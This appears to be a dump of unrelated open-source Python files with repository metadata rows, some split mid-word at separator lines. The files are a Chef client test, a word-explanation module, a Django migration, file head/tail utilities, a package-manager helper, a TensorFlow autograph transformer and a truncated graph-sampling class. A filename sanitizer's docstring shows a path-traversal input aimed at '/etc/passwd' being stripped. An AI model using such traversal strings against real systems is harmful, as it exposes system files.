obs = self.client.run_install("fakecookbook")
expected = "{'response': u'Alls good', 'success': True}"
self.assertEqual(expected, str(obs))
self.m.VerifyAll()
def test_run_test(self):
self.client.execute_command = self.m.CreateMockAnything()
self.client.container = "1234"
self.client.execute_command('cmdtest fakecookbook').AndReturn("Alls good")
self.m.ReplayAll()
obs = self.client.run_test("fakecookbook")
expected = "{'response': u'Alls good', 'success': True}"
self.assertEqual(expected, str(obs))
self.m.VerifyAll()
def test_execute_command(self):
|
"""Test a command execution in container"""
self.client.dc = self.m.CreateMockAnything()
self.client.container = "1234"
self.client.dc.exec_create(cmd='/bin/bash -c "mycommand"', container=u'1234').AndReturn("validcmd")
self.client.dc.exec_start("validcmd").AndReturn("OK")
self.m.ReplayAll()
obs = self.client.execute_command("mycommand")
self.assertEqual("OK",obs)
self.m.VerifyAll()
def tearDown(self):
""" Cleanup enviro
|
nment"""
super(ChefClientTestCase, self).tearDown()
self.m.UnsetStubs()
self.m.ResetAll()
|
hatbot-team/hatbot
|
explanator/_explanator.py
|
Python
|
mit
| 2,930
| 0
|
import itertools
import random
from hb_res.explanation_source import sources_registry, ExplanationSource
__author__ = 'moskupols'
ALL_SOURCES = sources_registry.sources_registered()
ALL_SOURCES_NAMES_SET = frozenset(sources_registry.names_registered())
all_words_list = []
words_list_by_source_name = dict()
for s in ALL_SOURCES:
li = list(s.explainable_words())
words_list_by_source_name[s.name] = li
all_words_list.extend(li)
all_words_set = frozenset(all_words_list)
SELECTED_SOURCE = sources_registry.source_for_name('Selected')
SELECTION_LEVELS = {'good', 'all'}
def _pick_sources_by_names(names):
if names is None:
sources_filtered = ALL_SOURCES
else:
if isinstance(names, str):
names = [names]
sources_filtered = list(map(sources_registry.source_for_name, names))
return sources_filtered
def get_explainable_words(sources=None):
"""
Returns an iterable of all words for which we have any explanation.
:return: iterable
"""
sources = _pick_sources_by_names(sources)
return itertools.chain(map(ExplanationSource.explainable_words, sources))
def get_random_word(*, sources_names=None, selection_level=None):
# assert sources_names is None or selection_level is None
if sources_names is None:
return random.choice(all_words_list
if selection_level == 'all'
else words_list_by_source_name['Selected'])
# If the user wants a sole specific asset, the task is straightforward
if not isinstance(sources_names, str) and len(sources_names) == 1:
sources_names = sources_names[0]
if isinstance(sources_names, str):
return random.choice(words_list_by_source_name[sources_names])
# otherwise we have to pick a uniformly random element from several lists,
# but we wouldn't like to join them, as they are long
|
lists = [words_list_by_source_name[name] for name in sources_names]
total = sum(map(len, lists))
rand = random.randrange(total)
upto = 0
for word_lis
|
t in lists:
upto += len(word_list)
if rand < upto:
return word_list[rand - upto] # yep, negative indexation
assert False, 'Shouldn\'t get here'
def explain_list(word, sources_names=None):
"""
Returns list of tuples (Explanations, asset_name)
"""
if word not in all_words_set:
return []
sources_filtered = _pick_sources_by_names(sources_names)
res = list()
for s in sources_filtered:
res.extend(zip(s.explain(word), itertools.repeat(s.name)))
random.shuffle(res)
return res
def explain(word, sources_names=None):
"""
Returns a tuple (Explanation, asset_name)
:param word: a russian noun in lowercase
:return: the explanation
"""
explanations = explain_list(word, sources_names)
return explanations[0] if len(explanations) else None
|
kapucko/bus-train-search
|
btsearch/exceptions.py
|
Python
|
apache-2.0
| 101
| 0.019802
|
class DestinationNotFoundExceptio
|
n(Exception):
pass
class InvalidDateFormat(Exception):
pas
|
s
|
RuralIndia/pari
|
pari/faces/migrations/0006_auto__add_field_face_district_id.py
|
Python
|
bsd-3-clause
| 11,120
| 0.009083
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Face.district_id'
db.add_column(u'faces_face', 'district_id',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['faces.District'], null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Face.district_id'
db.delete_column(u'faces_face', 'district_id_id')
models = {
'album.imagecollection': {
'Meta': {'object_name': 'ImageCollection'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'zip_import': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'})
},
'album.imagecollectionimage': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'ImageColl
|
ectionImage'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.model
|
s.fields.IntegerField', [], {'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'file': ('mezzanine.core.fields.FileField', [], {'max_length': '200'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_collection': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'images'", 'to': "orm['album.ImageCollection']"}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'faces.district': {
'Meta': {'object_name': 'District'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'district': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'district_description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'faces.face': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Face'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'district': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'district_id': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['faces.District']", 'null': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_collection': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['album.ImageCollection']"}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_pinned': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'
|
iesugrace/pycmd
|
lib.py
|
Python
|
gpl-3.0
| 24,434
| 0.000941
|
import sys
import os
import re
def human_size_to_byte(number):
"""
Convert number of these units to bytes, ignore case:
b : 512
kB : 1000
K : 1024
mB : 1000*1000
m : 1024*1024
MB : 1000*1000
M : 1024*1024
GB : 1000*1000*1000
G : 1024*1024*1024
TB : 1000*1000*1000*1000
T : 1024*1024*1024*1024
PB : 1000*1000*1000*1000*1000
P : 1024*1024*1024*1024*1024
EB : 1000*1000*1000*1000*1000*1000
E : 1024*1024*1024*1024*1024*1024
ZB : 1000*1000*1000*1000*1000*1000*1000
Z : 1024*1024*1024*1024*1024*1024*1024
YB : 1000*1000*1000*1000*1000*1000*1000*1000
Y : 1024*1024*1024*1024*1024*1024*1024*1024
number is of one of these forms:
123, 123b, 123M, 1G
"""
mapping = {
'b' : 512 ,
'kb' : 1000,
'k' : 1024,
'mb' : 1000**2,
'm' : 1024**2,
'gb' : 1000**3,
'g' : 1024**3,
'tb' : 1000**4,
't' : 1024**4,
'pb' : 1000**5,
'p' : 1024**5,
'eb' : 1000**6,
'e' : 1024**6,
'zb' : 1000**7,
'z' : 1024
|
**7,
'yb' : 1000**8,
'y' : 1024**8,
}
unit = re.sub('^[0-9]+', '', number)
if unit:
unit = unit.lower()
assert unit in mapping.keys(), "wrong unit %s " % unit
amount = int(number[:-len(unit)])
return mapping[unit] * amount
else:
return int(number)
def correct_offset(file):
"""Due to Python cache issue, the real file offset of the
underlying file de
|
scriptor may differ, this function can correct
it.
"""
cur = file.seek(0, 1)
file.seek(0, 2)
file.seek(cur)
def open_file(file):
if file == '-':
return os.fdopen(sys.stdin.fileno(), 'rb')
else:
return open(file, 'rb')
class Locator:
"""Search from the end of the file backward, locate the starting
offset of the specified amount, measured by line, or by byte.
"""
def __init__(self, ifile, mode, amount, bs=8192):
"""mode can be 'lines' or 'bytes'"""
assert ifile.seekable(), "input file is not seekable"
self.orig_pos = ifile.seek(0, 1)
self.ifile = ifile
self.mode = mode
self.amount = amount
self.bs = bs
def find_line(self, ifile, chunk, amount):
""" Find if data chunk contains 'amount' number of lines.
Return value: (stat, pos, remaining-amount). If stat is True,
pos is the result, otherwise pos is not used, remaining-amount
is for the next run.
"""
count = chunk.count(b'\n')
if count <= amount:
amount -= count
return False, 0, amount
else: # found
pos = -1
for i in range(count - amount):
pos = chunk.index(b'\n', pos+1)
pos += 1
diff = len(chunk) - pos
pos = ifile.seek(-diff, 1)
return True, pos, 0
def find_byte(self, ifile, chunk, amount):
""" Find if data chunk contains 'amount' number of bytes.
Return value: (stat, pos, remaining-amount). If stat is True,
pos is the result, otherwise pos is not used, remaining-amount
is for the next run.
"""
length = len(chunk)
if length < amount:
amount -= length
return False, 0, amount
else: # found
pos = ifile.seek(-amount, 1)
return True, pos, 0
def find(self, ifile, offset, size, amount):
"""Read 'size' bytes starting from offset to find.
Return value: (stat, pos, remaining-amount). If stat is True,
pos is the result, otherwise pos is not used, remaining-amount
is for the next run.
"""
try:
pos = ifile.seek(offset)
except OSError:
assert False, "unkown file seeking failure"
chunk = ifile.read(size)
if self.mode == 'lines':
return self.find_line(ifile, chunk, amount)
else:
return self.find_byte(ifile, chunk, amount)
def run(self):
"""Find the offset of the last 'amount' lines"""
ifile = self.ifile
amount = self.amount
orig_pos = self.orig_pos
end = ifile.seek(0, 2) # jump to the end
# nothing to process, return the original position
total = end - orig_pos
if total <= amount:
correct_offset(ifile)
return orig_pos
bs = self.bs
# process the last block
remaining = total % bs
offset = end - remaining
stat, pos, amount = self.find(ifile, offset, remaining, amount)
while not stat and offset != orig_pos:
offset -= bs
stat, pos, amount = self.find(ifile, offset, bs, amount)
ifile.seek(self.orig_pos)
correct_offset(ifile)
return pos
class Buffer:
def __init__(self, amount):
self.min = amount
self.total = 0
self.data = []
def push(self, pair):
self.data.append(pair)
self.total += pair[0]
def pop(self):
pair = self.data.pop(0)
self.total -= pair[0]
return pair
def cut(self):
"""Pop as many pairs off the head of the self.data as
self.is_ready() is True, return a combined result.
"""
count = 0
data = b''
while self.is_ready():
x, y = self.pop()
count += x
data += y
return count, data
def is_satisfied(self):
"""The minimum amount is satisfied"""
return self.total >= self.min
def is_ready(self):
"""The buffer is ready to pop"""
return self.total - self.data[0][0] >= self.min
class HeadWorkerSL:
"""Seekable, line mode"""
def __init__(self, ifile, ofile, amount, bs=None):
self.ifile = ifile
self.ofile = ofile
self.amount = amount
self.bs = bs or 8192
def read(self):
return self.ifile.read(self.bs)
def transform(self, data):
return data.count(b'\n')
def is_last(self, count):
return count >= self.amount
def action(self, data, count):
self.ofile.write(data)
self.amount -= count
def handle_last(self, data):
pos = -1
for i in range(self.amount):
pos = data.index(b'\n', pos+1)
pos += 1
self.ofile.write(data[:pos])
over_read = len(data) - pos
try:
self.ifile.seek(-over_read, 1)
except Exception:
pass
def run(self):
while self.amount:
data = self.read()
if not data:
break
count = self.transform(data)
if self.is_last(count):
self.handle_last(data)
break
else:
self.action(data, count)
class HeadWorkerSB(HeadWorkerSL):
"""Seekable, byte mode"""
def transform(self, data):
return len(data)
def handle_last(self, data):
self.ofile.write(data[:self.amount])
over_read = len(data) - self.amount
try:
self.ifile.seek(-over_read, 1)
except Exception:
pass
class HeadWorkerTL(HeadWorkerSL):
"""Terminal, line mode"""
def read(self):
return self.ifile.readline()
def action(self, data, count):
self.ofile.write(data)
self.amount -= 1
self.ofile.flush()
def handle_last(self, data):
self.ofile.write(data)
self.ofile.flush()
class HeadWorkerTB(HeadWorkerSB):
"""Terminal, byte mode"""
def read(self):
return self.ifile.readline()
class HeadWorkerULIT(HeadWorkerSL):
"""Unseekable, line mode ignore tail"""
def __init__(self, ifile, ofile, amount, bs=None):
self.ifile = ifile
self.ofile = ofile
self.amount = amount
self.bs = bs or 8192
def read(self):
return self.ifile.read(self.bs)
def transform(self, data):
return data.count(b'\n')
def fill(self):
"""Fill up t
|
darvid/hydrogen
|
hydrogen.py
|
Python
|
bsd-2-clause
| 26,677
| 0
|
# -*- coding: utf-8 -*-
"""
hydrogen
~~~~~~~~
Hydrogen is an extremely lightweight workflow enhancement tool for Python
|
web applications, providing bower/npm-like functionality for both pip and
bower packages.
:author: David Gidwani <david.gidwani@gmail.com>
:license: BSD, see LICENSE for details
"""
import atexit
from collections import defaultdict
from functools import update_wrapper
import json
|
import os
import re
import shutil
import sys
import tempfile
import yaml
import zipfile
import click
import envoy
from pathlib import Path, PurePath
from pathspec import GitIgnorePattern, PathSpec
from pip._vendor import pkg_resources
import requests
import rfc6266
import semver
__version__ = "0.0.1-alpha"
prog_name = "hydrogen"
app_dir = click.get_app_dir(prog_name)
github_api_uri = "https://api.github.com"
debug = True
# borrowed from werkzeug._compat
PY2 = sys.version_info[0] == 2
if PY2:
from urlparse import urlparse
text_type = unicode # noqa: Undefined in py3
else:
from urllib.parse import urlparse
text_type = str
class InvalidRequirementSpecError(Exception):
pass
class InvalidPackageError(Exception):
pass
class PackageNotFoundError(Exception):
pass
class VersionNotFoundError(Exception):
pass
def get_installed_pypackages():
return {p.project_name.lower(): p for p in pkg_resources.working_set}
def success(message, **kwargs):
kwargs["fg"] = kwargs.get("fg", "green")
click.secho(message, **kwargs)
def warning(message, **kwargs):
kwargs["fg"] = kwargs.get("fg", "red")
click.secho(u"warning: {}".format(message), **kwargs)
def error(message, level="error", exit_code=1, **kwargs):
kwargs["fg"] = kwargs.get("fg", "red")
click.secho(u"error: {}".format(message), **kwargs)
sys.exit(exit_code)
def fatal(message, **kwargs):
error(message, level="fatal", **kwargs)
def secure_filename(filename):
r"""Borrowed from :mod:`werkzeug.utils`, under the BSD 3-clause license.
Pass it a filename and it will return a secure version of it. This
filename can then safely be stored on a regular file system and passed
to :func:`os.path.join`. The filename returned is an ASCII only string
for maximum portability.
On windows systems the function also makes sure that the file is not
named after one of the special device files.
>>> secure_filename("My cool movie.mov")
'My_cool_movie.mov'
>>> secure_filename("../../../etc/passwd")
'etc_passwd'
>>> secure_filename(u'i contain cool \xfcml\xe4uts.txt')
'i_contain_cool_umlauts.txt'
The function might return an empty filename. It's your responsibility
to ensure that the filename is unique and that you generate random
filename if the function returned an empty one.
:param filename: the filename to secure
"""
_filename_ascii_strip_re = re.compile(r'[^A-Za-z0-9_.-]')
_windows_device_files = ('CON', 'AUX', 'COM1', 'COM2', 'COM3', 'COM4',
'LPT1', 'LPT2', 'LPT3', 'PRN', 'NUL')
if isinstance(filename, text_type):
from unicodedata import normalize
filename = normalize('NFKD', filename).encode('ascii', 'ignore')
if not PY2:
filename = filename.decode('ascii')
for sep in os.path.sep, os.path.altsep:
if sep:
filename = filename.replace(sep, ' ')
filename = str(_filename_ascii_strip_re.sub('', '_'.join(
filename.split()))).strip('._')
# on nt a couple of special files are present in each folder. We
# have to ensure that the target file is not such a filename. In
# this case we prepend an underline
if os.name == 'nt' and filename and \
filename.split('.')[0].upper() in _windows_device_files:
filename = '_' + filename
return filename
def get(url, session=None, silent=not debug, **kwargs):
"""Retrieve a given URL and log response.
:param session: a :class:`requests.Session` object.
:param silent: if **True**, response status and URL will not be printed.
"""
session = session or requests
kwargs["verify"] = kwargs.get("verify", True)
r = session.get(url, **kwargs)
if not silent:
status_code = click.style(
str(r.status_code),
fg="green" if r.status_code in (200, 304) else "red")
click.echo(status_code + " " + url)
if r.status_code == 404:
raise PackageNotFoundError
return r
def download_file(url, dest=None, chunk_size=1024, replace="ask",
label="Downloading {dest_basename} ({size:.2f}MB)",
expected_extension=None):
"""Download a file from a given URL and display progress.
:param dest: If the destination exists and is a directory, the filename
will be guessed from the Content-Disposition header. If the destination
is an existing file, the user will either be prompted to overwrite, or
the file will be replaced (depending on the value of **replace**). If
the destination does not exist, it will be used as the filename.
:param int chunk_size: bytes read in at a time.
:param replace: If `False`, an existing destination file will not be
overwritten.
:param label: a string which is formatted and displayed as the progress bar
label. Variables provided include *dest_basename*, *dest*, and *size*.
:param expected_extension: if set, the filename will be sanitized to ensure
it has the given extension. The extension should not start with a dot
(`.`).
"""
dest = Path(dest or url.split("/")[-1])
response = get(url, stream=True)
if (dest.exists()
and dest.is_dir()
and "Content-Disposition" in response.headers):
content_disposition = rfc6266.parse_requests_response(response)
if expected_extension is not None:
filename = content_disposition.filename_sanitized(
expected_extension)
filename = secure_filename(filename)
dest = dest / filename
if dest.exists() and not dest.is_dir():
if (replace is False
or replace == "ask"
and not click.confirm("Replace {}?".format(dest))):
return str(dest)
size = int(response.headers.get("content-length", 0))
label = label.format(dest=dest, dest_basename=dest.name,
size=size/1024.0/1024)
with click.open_file(str(dest), "wb") as f:
content_iter = response.iter_content(chunk_size=chunk_size)
with click.progressbar(content_iter, length=size/1024,
label=label) as bar:
for chunk in bar:
if chunk:
f.write(chunk)
f.flush()
return str(dest)
def get_dir_from_zipfile(zip_file, fallback=None):
"""Return the name of the root folder in a zip file.
:param zip_file: a :class:`zipfile.ZipFile` instance.
:param fallback: if `None`, the name of the zip file is used. This is
returned if the zip file contains more than one top-level directory,
or none at all.
"""
fallback = fallback or zip_file.filename
directories = [name for name in zip_file.namelist() if name.endswith("/")
and len(PurePath(name).parts) == 1]
return fallback if len(directories) > 1 else directories[0]
def mkdtemp(suffix="", prefix=__name__ + "_", dir=None, cleanup=True,
on_cleanup_error=None):
"""Create a temporary directory and register a handler to cleanup on exit.
:param suffix: suffix of the temporary directory, defaults to empty.
:param prefix: prefix of the temporary directory, defaults to `__name__`
and an underscore.
:param dir: if provided, the directory will be created in `dir` rather than
the system default temp directory.
:param cleanup: if `True`, an atexit handler will be registered to remove
the temp directory on exit.
:param on_cleanup_error: a callback which is called if the atexit handler
encounters an exception. It is passed three
|
nburn42/tensorflow
|
tensorflow/contrib/autograph/converters/side_effect_guards.py
|
Python
|
apache-2.0
| 7,026
| 0.007543
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Adds guards against function calls with side effects.
Only standalone calls are guarded.
WARNING: This mechanism is incomplete. Particularly, it only guards the
arguments passed to functions, and does not account for indirectly modified
state.
Example:
y = tf.layers.dense(x) # Creates TF variable 'foo'
loss = loss(y)
opt.minimize(loss) # indirectly affects 'foo'
z = tf.get_variable('foo') # Indirectly affects `loss` and 'foo'
# Here, `loss` can be guarded. But `z` cannot.
# TODO(mdan): We should probably define a safe mode where we guard everything.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.contrib.autograph.pyct import anno
from tensorflow.contrib.autograph.pyct import ast_util
from tensorflow.contrib.autograph.pyct import qual_names
from tensorflow.contrib.autograph.pyct import templates
from tensorflow.contrib.autograph.pyct import transformer
from tensorflow.contrib.autograph.pyct.static_analysis.annos import NodeAnno
class SymbolNamer(object):
"""Describes the interface for SideEffectGuardTransformer's namer."""
def new_symbol(self, name_root, reserved_locals):
"""Generate a new unique function_name.
Args:
name_root: String, used as stem in the new name.
reserved_locals: Set(string), additional local symbols that are reserved.
Returns:
String.
"""
raise NotImplementedError()
class SideEffectGuardTransformer(transformer.Base):
"""Adds control dependencies to functions with side effects."""
def __init__(self, context):
super(SideEffectGuardTransformer, self).__init__(context)
# pylint:disable=invalid-name
def _visit_and_reindent(self, nodes):
new_nodes = []
current_dest = new_nodes
alias_map = {}
reindent_requested = False
for n in nodes:
n = self.visit(n)
# NOTE: the order in which these statements execute is important; in
# particular, watch out for ending up with cycles in the AST.
if alias_map:
n = ast_util.rename_symbols(n, alias_map)
if isinstance(n, (list, tuple)):
current_dest.extend(n)
else:
current_dest.append(n)
if anno.hasanno(n, anno.Basic.INDENT_BLOCK_REMAINDER):
reindent_requested = True
new_dest, new_alias_map = anno.getanno(
n, anno.Basic.INDENT_BLOCK_REMAINDER)
anno.delanno(n, anno.Basic.INDENT_BLOCK_REMAINDER)
new_alias_map.update(alias_map)
alias_map = new_alias_map
current_dest = new_dest
if reindent_requested and not current_dest:
# TODO(mdan): There may still be something that could be done.
raise ValueError('Unable to insert statement into the computation flow: '
'it is not followed by any computation which '
'the statement could gate.')
return new_nodes
def visit_FunctionDef(self, node):
node.body = self._visit_and_reindent(node.body)
return node
def visit_With(self, node):
node.body = self._visit_and_reindent(node.body)
return node
def visit_If(self, node):
node.body = self._visit_and_reindent(node.body)
node.orelse = self._visit_and_reindent(node.orelse)
return node
def visit_While(self, node):
node.body = self._visit_and_reindent(node.body)
node.orelse = self._visit_and_reindent(node.orelse)
return node
def visit_Expr(self, node):
self.generic_visit(node)
if isinstance(node.value, gast.Call):
# Patterns of single function calls, like:
# opt.minimize(loss)
# or:
# tf.py_func(...)
# First, attempt to gate future evaluation of args. If that's not
# possible, gate all remaining statements (and that may fail too, see
# _visit_and_reindent.
args_scope = anno.getanno(node.value, NodeAnno.ARGS_SCOPE)
# NOTE: We can't guard object attributes because they may not be writable.
# In addition, avoid renaming well-known names.
# TODO(mdan): Move these names into config.
unguarded_names = (qual_names.QN('self'), qual_names.QN('tf'))
guarded_args = tuple(s for s in args_scope.used
if not s.is_composite() and s not in unguarded_names)
# TODO(mdan): Include all arguments which depended on guarded_args too.
# For example, the following will still cause a race:
# tf.assign(a, a + 1)
# b = a + 1
# tf.assign(a, a + 1) # Control deps here should include `b`
# c = b + 1
# Or maybe we should just raise an "unsafe assign" error?
if guarded_args:
# The aliases may need new names to avoid incorrectly making them local.
# TODO(mdan): This is brutal. It will even rename modules - any fix?
need_alias = tuple(
s for s in guarded_args if s not in args_scope.parent.modified)
aliased_new_names = tuple(
qual_names.QN(
self.context.namer.new_symbol(
s.ssf(), args_scope.parent.referenced)) for s in need_alias)
alias_map = dict(zip(need_alias, aliased_new_names))
if len(guarded_args) == 1:
s, = guarded_args
aliased_guarded_args = alias_map.get(s, s)
else:
aliased_guarded_args = gast.Tuple(
[alias_map.get(s, s).ast() for s in guarded_args], None)
template = """
with ag__.utils.control_dependency_on_returns(call):
aliased_guarded_args = ag__.utils.alias_tensors(guarded_args)
"""
control_
|
deps_guard = templates.replace(
template,
call=node.value,
aliased_guarded_args=aliased_guarded_args,
guarded_args=guarded_args)[-1]
else:
alias_map = {}
template = """
with ag__.utils.control_dependency_on
|
_returns(call):
pass
"""
control_deps_guard = templates.replace(template, call=node.value)[-1]
control_deps_guard.body = []
node = control_deps_guard
anno.setanno(node, anno.Basic.INDENT_BLOCK_REMAINDER,
(node.body, alias_map))
return node
# pylint:enable=invalid-name
def transform(node, context):
return SideEffectGuardTransformer(context).visit(node)
|
wenzheli/python_new
|
com/uva/network.py
|
Python
|
gpl-3.0
| 17,149
| 0.012595
|
import random
from sets import Set
class Network(object):
"""
Network class represents the whole graph that we read from the
data file. Since we store all the edges ONLY, the size of this
information is much smaller due to the graph sparsity (in general,
around 0.1% of links are connected)
We use the term "linked edges" to denote the edges that two nodes
are connected, "non linked edges", otherwise. If we just
|
say edge,
it means either linked or non-link edge.
The class also contains lots of sampling methods that sampler can utilize.
This is great separation between different learners and data layer. By calling
|
the function within this class, each learner can get different types of
data.
"""
def __init__(self, data, held_out_ratio):
"""
In this initialization step, we separate the whole data set
into training, validation and testing sets. Basically,
Training -> used for tuning the parameters.
Held-out/Validation -> used for evaluating the current model, avoid over-fitting
, the accuracy for validation set used as stopping criteria
Testing -> used for calculating final model accuracy.
Arguments:
data: representation of the while graph.
vlaidation_ratio: the percentage of data used for validation and testing.
"""
self.__N = data.N # number of nodes in the graph
self.__linked_edges = data.E # all pair of linked edges.
self.__num_total_edges = len(self.__linked_edges) # number of total edges.
self.__held_out_ratio = held_out_ratio # percentage of held-out data size
# Based on the a-MMSB paper, it samples equal number of
# linked edges and non-linked edges.
self.__held_out_size = int(held_out_ratio * len(self.__linked_edges))
# it is used for stratified random node sampling. By default 10
self.__num_pieces = 10
# The map stores all the neighboring nodes for each node, within the training
# set. The purpose of keeping this object is to make the stratified sampling
# process easier, in which case we need to sample all the neighboring nodes
# given the current one. The object looks like this:
# {
# 0: [1,3,1000,4000]
# 1: [0,4,999]
# .............
# 10000: [0,441,9000]
# }
self.__train_link_map = {}
self.__held_out_map = {} # store all held out edges
self.__test_map = {} # store all test edges
# initialize train_link_map
self.__init_train_link_map()
# randomly sample hold-out and test sets.
self.__init_held_out_set()
self.__init_test_set()
def sample_mini_batch(self, mini_batch_size, strategy):
"""
Sample a mini-batch of edges from the training data.
There are four different sampling strategies for edge sampling
1.random-pair sampling
sample node pairs uniformly at random.This method is an instance of independent
pair sampling, with h(x) equal to 1/(N(N-1)/2) * mini_batch_size
2.random-node sampling
A set consists of all the pairs that involve one of the N nodes: we first sample one of
the node from N nodes, and sample all the edges for that node. h(x) = 1/N
3.stratified-random-pair sampling
We divide the edges into linked and non-linked edges, and each time either sample
mini-batch from linked-edges or non-linked edges. g(x) = 1/N_0 for non-link and
1/N_1 for link, where N_0-> number of non-linked edges, N_1-> # of linked edges.
4.stratified-random-node sampling
For each node, we define a link set consisting of all its linkes, and m non-link sets
that partition its non-links. We first selct a random node, and either select its link
set or sample one of its m non-link sets. h(x) = 1/N if linked set, 1/Nm otherwise
Returns (sampled_edges, scale)
scale equals to 1/h(x), insuring the sampling gives the unbiased gradients.
"""
if strategy == "random-pair":
return self.__random_pair_sampling(mini_batch_size)
elif strategy == "random-node":
return self.__random_node_sampling()
elif strategy == "stratified-random-pair":
return self.__stratified_random_pair_sampling(mini_batch_size)
elif strategy == "stratified-random-node":
return self.__stratified_random_node_sampling(10)
else:
print "Invalid sampling strategy, please make sure you are using the correct one:\
